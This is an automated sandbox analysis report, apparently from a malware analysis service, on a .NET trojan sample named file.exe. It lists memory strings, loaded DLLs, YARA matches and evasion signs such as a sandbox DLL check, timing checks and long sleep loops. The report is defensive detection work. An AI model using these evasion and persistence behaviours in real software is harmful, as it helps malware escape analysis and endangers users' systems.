                  Source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000002.2110427135.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                  Source: file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                  Source: file.exe, 00000000.00000002.2132372049.0000000006780000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameZseobxu.dll" vs file.exe
                  Source: file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                  Source: file.exe, 00000000.00000000.2048140594.000000000030C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYxadnetaxoo.exe, vs file.exe
                  Source: file.exe, 00000002.00000002.2217688499.000000000174D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenameYxadnetaxoo.exe, vs file.exe
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.3732110.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.3732110.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.3732110.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.3732110.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.3732110.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.file.exe.3732110.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: classification engineClassification label: mal88.troj.evad.winEXE@3/0@1/1
                  Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeReversingLabs: Detection: 21%
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.37d4d38.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.6cb0000.9.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.file.exe.39a9ce8.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.file.exe.39a9ce8.0.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.file.exe.39a9ce8.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.file.exe.39a9ce8.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.file.exe.39a9ce8.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.file.exe.6b40000.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.file.exe.6b40000.8.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.file.exe.6b40000.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.file.exe.6b40000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.file.exe.6b40000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.file.exe.3732110.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.3732110.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.file.exe.3732110.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: Yara matchFile source: 0.2.file.exe.6a50000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2133396929.0000000006A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 1984, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06951913 push eax; ret 0_2_0695191D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0699976E push es; ret 0_2_06999770
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0699F580 push es; ret 0_2_0699F630
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06999AC6 push es; retf 0_2_06999ADC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06999A02 push es; iretd 0_2_06999A04
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06999889 push es; ret 0_2_06999894
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A1BAD push BA04B4B4h; retf 0_2_069A1BB9
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069A18AE push BA04B4B4h; ret 0_2_069A18B3
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C6E87 push es; retf 0_2_069C6E90
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C22C7 push es; retf 0_2_069C23A4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C92F0 push esp; retf 0_2_069C92FD
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C062D push es; ret 0_2_069C0664
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C0665 push es; ret 0_2_069C0664
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C23A5 push es; iretd 0_2_069C23C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C2325 push es; retf 0_2_069C23A4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C58F3 push es; iretd 0_2_069C5940
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CAC34 push es; ret 0_2_069CAC50
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069DB8D8 push es; iretd 0_2_069DB90C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069DB981 push es; iretd 0_2_069DB9A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069D9F32 push es; iretd 0_2_069D9F7C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069DB97D push es; iretd 0_2_069DB980
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CA5405 push FFFFFF8Bh; iretd 0_2_06CA5407
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CA552D push FFFFFF8Bh; iretd 0_2_06CA552F
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CA53EC push FFFFFF8Bh; ret 0_2_06CA53F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CA53B1 push FFFFFF8Bh; ret 0_2_06CA53B6
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E335AF push esi; retf 0_2_06E335B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041A81A push ebx; retf 2_2_0041A823
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041F276 push cs; ret 2_2_0041F29C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004192FE push esp; retf 2_2_004192FF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041F283 push cs; ret 2_2_0041F29C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00423A9F push ecx; iretd 2_2_00423AD4
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 1984, type: MEMORYSTR
                  Source: file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2440000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2440000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0169096E rdtsc 2_2_0169096E
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 7373Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1705Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.6 %
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 2992Thread sleep count: 7373 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 2992Thread sleep count: 1705 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -99765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -99657s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -99532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -99407s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -99282s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -99172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -99062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98733s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98516s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98405s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -98071s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -97932s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -97828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -97719s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -97594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -97485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -97360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -97235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -97110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -96985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -96860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -96735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -96610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -96485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -96360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -96235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -96110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -95985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -95860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -95735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -95610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -95335s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -95205s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -95078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -94969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5660Thread sleep time: -94860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 6540Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
